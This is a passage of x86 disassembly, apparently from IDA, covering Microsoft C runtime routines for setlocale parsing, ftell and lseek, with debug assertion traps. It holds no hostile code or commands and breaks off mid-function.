loc_42DD9E: ; CODE XREF: _0:0042DD93�j
cmp dword ptr [ebp-10h], 5
jg short loc_42DE00
cmp dword ptr [ebp-10h], 0
jz short loc_42DDFE
mov eax, [ebp-10h]
imul eax, 0Ch
mov ecx, ds:dword_4542C4[eax]
push ecx
lea edx, [ebp-98h]
push edx
call sub_41F7E0
add esp, 8
test eax, eax
jz short loc_42DDF5
lea eax, [ebp-98h]
push eax
mov ecx, [ebp-10h]
push ecx
call sub_42DE80
add esp, 8
test eax, eax
jz short loc_42DDEC
mov edx, [ebp-0Ch]
add edx, 1
mov [ebp-0Ch], edx
jmp short loc_42DDF3
; ---------------------------------------------------------------------------
loc_42DDEC: ; CODE XREF: _0:0042DDDF�j
mov dword ptr [ebp-14h], 0
loc_42DDF3: ; CODE XREF: _0:0042DDEA�j
jmp short loc_42DDFE
; ---------------------------------------------------------------------------
loc_42DDF5: ; CODE XREF: _0:0042DDC8�j
mov eax, [ebp-0Ch]
add eax, 1
mov [ebp-0Ch], eax
loc_42DDFE: ; CODE XREF: _0:0042DDA8�j
; _0:loc_42DDF3�j
jmp short loc_42DD95
; ---------------------------------------------------------------------------
loc_42DE00: ; CODE XREF: _0:0042DDA2�j
cmp dword ptr [ebp-14h], 0
jz short loc_42DE2B
call sub_42E020
mov [ebp-8], eax
push 2
mov ecx, ds:dword_4542C4
push ecx
call sub_41CA10
add esp, 8
mov ds:dword_4542C4, 0
jmp short loc_42DE51
; ---------------------------------------------------------------------------
loc_42DE2B: ; CODE XREF: _0:0042DE04�j
cmp dword ptr [ebp-0Ch], 0
jz short loc_42DE3E
call sub_42E020
mov [ebp-0B0h], eax
jmp short loc_42DE48
; ---------------------------------------------------------------------------
loc_42DE3E: ; CODE XREF: _0:0042DE2F�j
mov dword ptr [ebp-0B0h], 0
loc_42DE48: ; CODE XREF: _0:0042DE3C�j
mov edx, [ebp-0B0h]
mov [ebp-8], edx
loc_42DE51: ; CODE XREF: _0:0042DD5F�j _0:0042DD86�j ...
jmp short loc_42DE5B
; ---------------------------------------------------------------------------
loc_42DE53: ; CODE XREF: _0:0042DB33�j
call sub_42E020
mov [ebp-8], eax
loc_42DE5B: ; CODE XREF: _0:0042DB1C�j
; _0:loc_42DE51�j
cmp dword ptr [ebp-4], 0
jz short loc_42DE78
push 13h
call sub_423320
add esp, 4
mov eax, ds:dword_4F37C4
sub eax, 1
mov ds:dword_4F37C4, eax
loc_42DE78: ; CODE XREF: _0:0042DE5F�j
mov eax, [ebp-8]
loc_42DE7B: ; CODE XREF: _0:0042DAA7�j _0:0042DBDE�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DE80 proc near ; CODE XREF: _0:0042DAF1�p _0:0042DCE5�p ...
var_A8 = dword ptr -0A8h
var_A0 = dword ptr -0A0h
var_9C = byte ptr -9Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0A8h
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_A0]
push ecx
lea edx, [ebp+var_A8]
push edx
lea eax, [ebp+var_9C]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_42E120
add esp, 14h
test eax, eax
jnz short loc_42DEB9
xor eax, eax
jmp loc_42E00F
; ---------------------------------------------------------------------------
loc_42DEB9: ; CODE XREF: sub_42DE80+30�j
push 132h
push offset aSetlocal_c ; "setlocal.c"
push 2
lea edx, [ebp+var_9C]
push edx
call sub_41BC70
add esp, 4
add eax, 1
push eax
call sub_41BE70
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_42DEF0
xor eax, eax
jmp loc_42E00F
; ---------------------------------------------------------------------------
loc_42DEF0: ; CODE XREF: sub_42DE80+67�j
mov eax, [ebp+arg_0]
imul eax, 0Ch
mov ecx, ds:dword_4542C4[eax]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
mov eax, ds:dword_4F33F0[edx*4]
mov [ebp+var_4], eax
push 6
mov ecx, [ebp+arg_0]
imul ecx, 6
add ecx, offset dword_4F3630
push ecx
lea edx, [ebp+var_14]
push edx
call sub_41FBF0
add esp, 0Ch
mov eax, ds:dword_4F3408
mov [ebp+var_18], eax
lea ecx, [ebp+var_9C]
push ecx
mov edx, [ebp+var_8]
push edx
call sub_41F620
add esp, 8
mov ecx, [ebp+arg_0]
imul ecx, 0Ch
mov ds:dword_4542C4[ecx], eax
mov edx, [ebp+var_A8]
and edx, 0FFFFh
mov eax, [ebp+arg_0]
mov ds:dword_4F33F0[eax*4], edx
push 6
lea ecx, [ebp+var_A8]
push ecx
mov edx, [ebp+arg_0]
imul edx, 6
add edx, offset dword_4F3630
push edx
call sub_41FBF0
add esp, 0Ch
cmp [ebp+arg_0], 2
jnz short loc_42DF93
mov eax, [ebp+var_A0]
mov ds:dword_4F3408, eax
loc_42DF93: ; CODE XREF: sub_42DE80+106�j
cmp [ebp+arg_0], 1
jnz short loc_42DFA5
mov ecx, [ebp+var_A0]
mov ds:dword_4F340C, ecx
loc_42DFA5: ; CODE XREF: sub_42DE80+117�j
mov edx, [ebp+arg_0]
imul edx, 0Ch
call ds:off_4542C8[edx]
test eax, eax
jz short loc_42DFEC
mov eax, [ebp+arg_0]
imul eax, 0Ch
mov ecx, [ebp+var_C]
mov ds:dword_4542C4[eax], ecx
push 2
mov edx, [ebp+var_8]
push edx
call sub_41CA10
add esp, 8
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov ds:dword_4F33F0[eax*4], ecx
mov edx, [ebp+var_18]
mov ds:dword_4F3408, edx
xor eax, eax
jmp short loc_42E00F
; ---------------------------------------------------------------------------
loc_42DFEC: ; CODE XREF: sub_42DE80+133�j
cmp [ebp+var_C], offset dword_4541B4
jz short loc_42E003
push 2
mov eax, [ebp+var_C]
push eax
call sub_41CA10
add esp, 8
loc_42E003: ; CODE XREF: sub_42DE80+173�j
mov ecx, [ebp+arg_0]
imul ecx, 0Ch
mov eax, ds:dword_4542C4[ecx]
loc_42E00F: ; CODE XREF: sub_42DE80+34�j
; sub_42DE80+6B�j ...
mov esp, ebp
pop ebp
retn
sub_42DE80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E020 proc near ; CODE XREF: _0:0042DD3F�p _0:0042DE06�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 1
cmp ds:dword_4542C4, 0
jnz short loc_42E054
push 167h
push offset aSetlocal_c ; "setlocal.c"
push 2
push 351h
call sub_41BE70
add esp, 10h
mov ds:dword_4542C4, eax
loc_42E054: ; CODE XREF: sub_42E020+14�j
mov eax, ds:dword_4542C4
mov byte ptr [eax], 0
mov [ebp+var_4], 1
jmp short loc_42E06E
; ---------------------------------------------------------------------------
loc_42E065: ; CODE XREF: sub_42E020:loc_42E117�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_42E06E: ; CODE XREF: sub_42E020+43�j
mov edx, [ebp+var_4]
imul edx, 0Ch
mov eax, ds:dword_4542C4[edx]
push eax
push offset asc_43D3F4 ; "="
mov ecx, [ebp+var_4]
imul ecx, 0Ch
mov edx, ds:off_4542C0[ecx]
push edx
push 3
mov eax, ds:dword_4542C4
push eax
call sub_42E2C0
add esp, 14h
cmp [ebp+var_4], 5
jge short loc_42E0E9
push offset asc_43D3E0 ; ";"
mov ecx, ds:dword_4542C4
push ecx
call sub_41F630
add esp, 8
mov edx, [ebp+var_4]
add edx, 1
imul edx, 0Ch
mov eax, ds:dword_4542C4[edx]
push eax
mov ecx, [ebp+var_4]
imul ecx, 0Ch
mov edx, ds:dword_4542C4[ecx]
push edx
call sub_41F7E0
add esp, 8
test eax, eax
jz short loc_42E0E7
mov [ebp+var_8], 0
loc_42E0E7: ; CODE XREF: sub_42E020+BE�j
jmp short loc_42E117
; ---------------------------------------------------------------------------
loc_42E0E9: ; CODE XREF: sub_42E020+81�j
cmp [ebp+var_8], 0
jnz short loc_42E0F6
mov eax, ds:dword_4542C4
jmp short loc_42E11C
; ---------------------------------------------------------------------------
loc_42E0F6: ; CODE XREF: sub_42E020+CD�j
push 2
mov eax, ds:dword_4542C4
push eax
call sub_41CA10
add esp, 8
mov ds:dword_4542C4, 0
mov eax, ds:off_4542DC
jmp short loc_42E11C
; ---------------------------------------------------------------------------
loc_42E117: ; CODE XREF: sub_42E020:loc_42E0E7�j
jmp loc_42E065
; ---------------------------------------------------------------------------
loc_42E11C: ; CODE XREF: sub_42E020+D4�j
; sub_42E020+F5�j
mov esp, ebp
pop ebp
retn
sub_42E020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E120 proc near ; CODE XREF: _0:0042DD77�p
; sub_42DE80+26�p
var_88 = byte ptr -88h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 88h
cmp [ebp+arg_0], 0
jnz short loc_42E136
xor eax, eax
jmp loc_42E2A0
; ---------------------------------------------------------------------------
loc_42E136: ; CODE XREF: sub_42E120+D�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
cmp ecx, 43h
jnz short loc_42E190
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+1]
test eax, eax
jnz short loc_42E190
mov ecx, [ebp+arg_4]
mov byte ptr [ecx], 43h
mov edx, [ebp+arg_4]
mov byte ptr [edx+1], 0
cmp [ebp+arg_8], 0
jz short loc_42E179
mov eax, [ebp+arg_8]
mov word ptr [eax], 0
mov ecx, [ebp+arg_8]
mov word ptr [ecx+2], 0
mov edx, [ebp+arg_8]
mov word ptr [edx+4], 0
loc_42E179: ; CODE XREF: sub_42E120+3D�j
cmp [ebp+arg_C], 0
jz short loc_42E188
mov eax, [ebp+arg_C]
mov dword ptr [eax], 0
loc_42E188: ; CODE XREF: sub_42E120+5D�j
mov eax, [ebp+arg_4]
jmp loc_42E2A0
; ---------------------------------------------------------------------------
loc_42E190: ; CODE XREF: sub_42E120+1F�j
; sub_42E120+2A�j
mov ecx, [ebp+arg_0]
push ecx
push offset dword_45423C
call sub_41F7E0
add esp, 8
test eax, eax
jz loc_42E258
mov edx, [ebp+arg_0]
push edx
push offset dword_4541B8
call sub_41F7E0
add esp, 8
test eax, eax
jz loc_42E258
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_88]
push ecx
call sub_42E310
add esp, 8
test eax, eax
jz short loc_42E1E0
xor eax, eax
jmp loc_42E2A0
; ---------------------------------------------------------------------------
loc_42E1E0: ; CODE XREF: sub_42E120+B7�j
lea edx, [ebp+var_88]
push edx
push offset dword_4F3410
lea eax, [ebp+var_88]
push eax
call sub_434EB0
add esp, 0Ch
test eax, eax
jnz short loc_42E206
xor eax, eax
jmp loc_42E2A0
; ---------------------------------------------------------------------------
loc_42E206: ; CODE XREF: sub_42E120+DD�j
xor ecx, ecx
mov cx, ds:word_4F3414
mov ds:dword_4F3418, ecx
lea edx, [ebp+var_88]
push edx
push offset dword_45423C
call sub_42E470
add esp, 8
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42E246
mov edx, [ebp+arg_0]
push edx
push offset dword_4541B8
call sub_41F620
add esp, 8
jmp short loc_42E258
; ---------------------------------------------------------------------------
loc_42E246: ; CODE XREF: sub_42E120+111�j
push offset dword_45423C
push offset dword_4541B8
call sub_41F620
add esp, 8
loc_42E258: ; CODE XREF: sub_42E120+83�j
; sub_42E120+9C�j ...
cmp [ebp+arg_8], 0
jz short loc_42E271
push 6
push offset dword_4F3410
mov eax, [ebp+arg_8]
push eax
call sub_41FBF0
add esp, 0Ch
loc_42E271: ; CODE XREF: sub_42E120+13C�j
cmp [ebp+arg_C], 0
jz short loc_42E28A
push 4
push offset dword_4F3418
mov ecx, [ebp+arg_C]
push ecx
call sub_41FBF0
add esp, 0Ch
loc_42E28A: ; CODE XREF: sub_42E120+155�j
push offset dword_45423C
mov edx, [ebp+arg_4]
push edx
call sub_41F620
add esp, 8
mov eax, offset dword_45423C
loc_42E2A0: ; CODE XREF: sub_42E120+11�j
; sub_42E120+6B�j ...
mov esp, ebp
pop ebp
retn
sub_42E120 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E2B0 proc near ; CODE XREF: sub_42DE80+12B�p
; DATA XREF: _2:off_4542C8�o
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_42E2B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E2C0 proc near ; CODE XREF: sub_42E020+75�p
; sub_42E470+30�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 8
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov [ebp+var_8], 0
jmp short loc_42E2DE
; ---------------------------------------------------------------------------
loc_42E2D5: ; CODE XREF: sub_42E2C0+42�j
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_42E2DE: ; CODE XREF: sub_42E2C0+13�j
mov edx, [ebp+var_8]
cmp edx, [ebp+arg_4]
jge short loc_42E304
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov edx, [ecx-4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_41F630
add esp, 8
jmp short loc_42E2D5
; ---------------------------------------------------------------------------
loc_42E304: ; CODE XREF: sub_42E2C0+24�j
mov [ebp+var_4], 0
mov esp, ebp
pop ebp
retn
sub_42E2C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E310 proc near ; CODE XREF: sub_42E120+AD�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 88h
push 0
mov eax, [ebp+arg_0]
push eax
call sub_41E4B0
add esp, 0Ch
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_42E33A
xor eax, eax
jmp loc_42E469
; ---------------------------------------------------------------------------
loc_42E33A: ; CODE XREF: sub_42E310+21�j
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
cmp ecx, 2Eh
jnz short loc_42E370
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx+1]
test eax, eax
jz short loc_42E370
mov ecx, [ebp+arg_4]
add ecx, 1
push ecx
mov edx, [ebp+arg_0]
add edx, 80h
push edx
call sub_41F620
add esp, 8
xor eax, eax
jmp loc_42E469
; ---------------------------------------------------------------------------
loc_42E370: ; CODE XREF: sub_42E310+33�j
; sub_42E310+3E�j
mov [ebp+var_4], 0
jmp short loc_42E382
; ---------------------------------------------------------------------------
loc_42E379: ; CODE XREF: sub_42E310+152�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_42E382: ; CODE XREF: sub_42E310+67�j
push offset a___0 ; "_.,"
mov ecx, [ebp+arg_4]
push ecx
call sub_434E30
add esp, 8
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_42E3A4
or eax, 0FFFFFFFFh
jmp loc_42E469
; ---------------------------------------------------------------------------
loc_42E3A4: ; CODE XREF: sub_42E310+8A�j
mov edx, [ebp+arg_4]
add edx, [ebp+var_C]
mov al, [edx]
mov [ebp+var_8], al
cmp [ebp+var_4], 0
jnz short loc_42E3DA
cmp [ebp+var_C], 40h
jge short loc_42E3DA
movsx ecx, [ebp+var_8]
cmp ecx, 2Eh
jz short loc_42E3DA
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41E510
add esp, 0Ch
jmp short loc_42E440
; ---------------------------------------------------------------------------
loc_42E3DA: ; CODE XREF: sub_42E310+A3�j
; sub_42E310+A9�j ...
cmp [ebp+var_4], 1
jnz short loc_42E408
cmp [ebp+var_C], 40h
jge short loc_42E408
movsx edx, [ebp+var_8]
cmp edx, 5Fh
jz short loc_42E408
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
add edx, 40h
push edx
call sub_41E510
add esp, 0Ch
jmp short loc_42E440
; ---------------------------------------------------------------------------
loc_42E408: ; CODE XREF: sub_42E310+CE�j
; sub_42E310+D4�j ...
cmp [ebp+var_4], 2
jnz short loc_42E43B
movsx eax, [ebp+var_8]
test eax, eax
jz short loc_42E41F
movsx ecx, [ebp+var_8]
cmp ecx, 2Ch
jnz short loc_42E43B
loc_42E41F: ; CODE XREF: sub_42E310+104�j
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
add ecx, 80h
push ecx
call sub_41E510
add esp, 0Ch
jmp short loc_42E440
; ---------------------------------------------------------------------------
loc_42E43B: ; CODE XREF: sub_42E310+FC�j
; sub_42E310+10D�j
or eax, 0FFFFFFFFh
jmp short loc_42E469
; ---------------------------------------------------------------------------
loc_42E440: ; CODE XREF: sub_42E310+C8�j
; sub_42E310+F6�j ...
movsx edx, [ebp+var_8]
cmp edx, 2Ch
jnz short loc_42E44B
jmp short loc_42E467
; ---------------------------------------------------------------------------
loc_42E44B: ; CODE XREF: sub_42E310+137�j
movsx eax, [ebp+var_8]
test eax, eax
jnz short loc_42E455
jmp short loc_42E467
; ---------------------------------------------------------------------------
loc_42E455: ; CODE XREF: sub_42E310+141�j
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_4]
lea eax, [edx+ecx+1]
mov [ebp+arg_4], eax
jmp loc_42E379
; ---------------------------------------------------------------------------
loc_42E467: ; CODE XREF: sub_42E310+139�j
; sub_42E310+143�j
xor eax, eax
loc_42E469: ; CODE XREF: sub_42E310+25�j
; sub_42E310+5B�j ...
mov esp, ebp
pop ebp
retn
sub_42E310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E470 proc near ; CODE XREF: sub_42E120+101�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41F620
add esp, 8
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx+40h]
test eax, eax
jz short loc_42E4A8
mov ecx, [ebp+arg_4]
add ecx, 40h
push ecx
push offset a__5 ; "_"
push 2
mov edx, [ebp+arg_0]
push edx
call sub_42E2C0
add esp, 10h
loc_42E4A8: ; CODE XREF: sub_42E470+1C�j
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax+80h]
test ecx, ecx
jz short loc_42E4D3
mov edx, [ebp+arg_4]
add edx, 80h
push edx
push offset a__4 ; "."
push 2
mov eax, [ebp+arg_0]
push eax
call sub_42E2C0
add esp, 10h
loc_42E4D3: ; CODE XREF: sub_42E470+44�j
pop ebp
retn
sub_42E470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E4E0 proc near ; CODE XREF: sub_421050+10E�p
; sub_427CE0+216�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4F37C0
jnb short loc_42E511
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_42E52C
loc_42E511: ; CODE XREF: sub_42E4E0+D�j
call sub_429A90
mov dword ptr [eax], 9
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_42E55E
; ---------------------------------------------------------------------------
loc_42E52C: ; CODE XREF: sub_42E4E0+2F�j
mov edx, [ebp+arg_0]
push edx
call sub_431070
add esp, 4
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42E570
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
call sub_431100
add esp, 4
mov eax, [ebp+var_4]
loc_42E55E: ; CODE XREF: sub_42E4E0+4A�j
mov esp, ebp
pop ebp
retn
sub_42E4E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E570 proc near ; CODE XREF: sub_427380+40D�p
; sub_42E4E0+64�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push eax
call sub_430EF0
add esp, 4
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_42E59E
call sub_429A90
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp loc_42E61E
; ---------------------------------------------------------------------------
loc_42E59E: ; CODE XREF: sub_42E570+19�j
mov ecx, [ebp+arg_8]
push ecx
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+var_C]
push eax
call ds:off_4F53F4
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_42E5C6
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov [ebp+var_4], eax
jmp short loc_42E5CD
; ---------------------------------------------------------------------------
loc_42E5C6: ; CODE XREF: sub_42E570+49�j
mov [ebp+var_4], 0
loc_42E5CD: ; CODE XREF: sub_42E570+54�j
cmp [ebp+var_4], 0
jz short loc_42E5E4
mov ecx, [ebp+var_4]
push ecx
call sub_4299F0
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_42E61E
; ---------------------------------------------------------------------------
loc_42E5E4: ; CODE XREF: sub_42E570+61�j
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, ds:dword_4F36C0[edx*4]
mov dl, [ecx+eax+4]
and dl, 0FDh
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov eax, ds:dword_4F36C0[eax*4]
mov [eax+ecx+4], dl
mov eax, [ebp+var_8]
loc_42E61E: ; CODE XREF: sub_42E570+29�j
; sub_42E570+72�j
mov esp, ebp
pop ebp
retn
sub_42E570 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_42E637: ; CODE XREF: _0:0042E65F�j
cmp dword ptr [ebp+8], 0
jnz short loc_42E65B
push offset dword_43C504
push 0
push 32h
push offset aFtell_c ; "ftell.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_42E65B
int 3 ; Trap to Debugger
loc_42E65B: ; CODE XREF: _0:0042E63B�j _0:0042E658�j
xor eax, eax
test eax, eax
jnz short loc_42E637
mov ecx, [ebp+8]
push ecx
call sub_422420
add esp, 4
mov edx, [ebp+8]
push edx
call sub_42E6A0
add esp, 4
mov [ebp-4], eax
mov eax, [ebp+8]
push eax
call sub_422490
add esp, 4
mov eax, [ebp-4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E6A0 proc near ; CODE XREF: sub_421050+87�p
; _0:0042E671�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
loc_42E6A9: ; CODE XREF: sub_42E6A0+31�j
cmp [ebp+arg_0], 0
jnz short loc_42E6CD
push offset dword_43C514
push 0
push 63h
push offset aFtell_c ; "ftell.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_42E6CD
int 3 ; Trap to Debugger
loc_42E6CD: ; CODE XREF: sub_42E6A0+D�j
; sub_42E6A0+2A�j
xor eax, eax
test eax, eax
jnz short loc_42E6A9
mov ecx, [ebp+arg_0]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
mov eax, [edx+10h]
mov [ebp+var_8], eax
mov ecx, [ebp+var_C]
cmp dword ptr [ecx+4], 0
jge short loc_42E6F5
mov edx, [ebp+var_C]
mov dword ptr [edx+4], 0
loc_42E6F5: ; CODE XREF: sub_42E6A0+49�j
push 1
push 0
mov eax, [ebp+var_8]
push eax
call sub_42E4E0
add esp, 0Ch
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jge short loc_42E716
or eax, 0FFFFFFFFh
jmp loc_42E933
; ---------------------------------------------------------------------------
loc_42E716: ; CODE XREF: sub_42E6A0+6C�j
mov ecx, [ebp+var_C]
mov edx, [ecx+0Ch]
and edx, 108h
test edx, edx
jnz short loc_42E736
mov eax, [ebp+var_C]
mov ecx, [ebp+var_1C]
sub ecx, [eax+4]
mov eax, ecx
jmp loc_42E933
; ---------------------------------------------------------------------------
loc_42E736: ; CODE XREF: sub_42E6A0+84�j
mov edx, [ebp+var_C]
mov eax, [ebp+var_C]
mov ecx, [edx]
sub ecx, [eax+8]
mov [ebp+var_18], ecx
mov edx, [ebp+var_C]
mov eax, [edx+0Ch]
and eax, 3
test eax, eax
jz short loc_42E7AC
mov ecx, [ebp+var_8]
sar ecx, 5
mov edx, [ebp+var_8]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 80h
test ecx, ecx
jz short loc_42E7AA
mov edx, [ebp+var_C]
mov eax, [edx+8]
mov [ebp+var_4], eax
jmp short loc_42E78A
; ---------------------------------------------------------------------------
loc_42E781: ; CODE XREF: sub_42E6A0:loc_42E7A8�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_42E78A: ; CODE XREF: sub_42E6A0+DF�j
mov edx, [ebp+var_C]
mov eax, [ebp+var_4]
cmp eax, [edx]
jnb short loc_42E7AA
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0Ah
jnz short loc_42E7A8
mov eax, [ebp+var_18]
add eax, 1
mov [ebp+var_18], eax
loc_42E7A8: ; CODE XREF: sub_42E6A0+FD�j
jmp short loc_42E781
; ---------------------------------------------------------------------------
loc_42E7AA: ; CODE XREF: sub_42E6A0+D4�j
; sub_42E6A0+F2�j
jmp short loc_42E7CF
; ---------------------------------------------------------------------------
loc_42E7AC: ; CODE XREF: sub_42E6A0+AF�j
mov ecx, [ebp+var_C]
mov edx, [ecx+0Ch]
and edx, 80h
test edx, edx
jnz short loc_42E7CF
call sub_429A90
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
jmp loc_42E933
; ---------------------------------------------------------------------------
loc_42E7CF: ; CODE XREF: sub_42E6A0:loc_42E7AA�j
; sub_42E6A0+11A�j
cmp [ebp+var_1C], 0
jnz short loc_42E7DD
mov eax, [ebp+var_18]
jmp loc_42E933
; ---------------------------------------------------------------------------
loc_42E7DD: ; CODE XREF: sub_42E6A0+133�j
mov eax, [ebp+var_C]
mov ecx, [eax+0Ch]
and ecx, 1
test ecx, ecx
jz loc_42E92D
mov edx, [ebp+var_C]
cmp dword ptr [edx+4], 0
jnz short loc_42E803
mov [ebp+var_18], 0
jmp loc_42E92D
; ---------------------------------------------------------------------------
loc_42E803: ; CODE XREF: sub_42E6A0+155�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_C]
mov edx, [eax]
sub edx, [ecx+8]
mov eax, [ebp+var_C]
mov ecx, [eax+4]
add ecx, edx
mov [ebp+var_10], ecx
mov edx, [ebp+var_8]
sar edx, 5
mov eax, [ebp+var_8]
and eax, 1Fh
imul eax, 24h
mov ecx, ds:dword_4F36C0[edx*4]
movsx edx, byte ptr [ecx+eax+4]
and edx, 80h
test edx, edx
jz loc_42E924
push 2
push 0
mov eax, [ebp+var_8]
push eax
call sub_42E4E0
add esp, 0Ch
cmp eax, [ebp+var_1C]
jnz short loc_42E8B0
mov ecx, [ebp+var_C]
mov edx, [ecx+8]
add edx, [ebp+var_10]
mov [ebp+var_14], edx
mov eax, [ebp+var_C]
mov ecx, [eax+8]
mov [ebp+var_4], ecx
jmp short loc_42E877
; ---------------------------------------------------------------------------
loc_42E86E: ; CODE XREF: sub_42E6A0:loc_42E893�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42E877: ; CODE XREF: sub_42E6A0+1CC�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_14]
jnb short loc_42E895
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0Ah
jnz short loc_42E893
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
loc_42E893: ; CODE XREF: sub_42E6A0+1E8�j
jmp short loc_42E86E
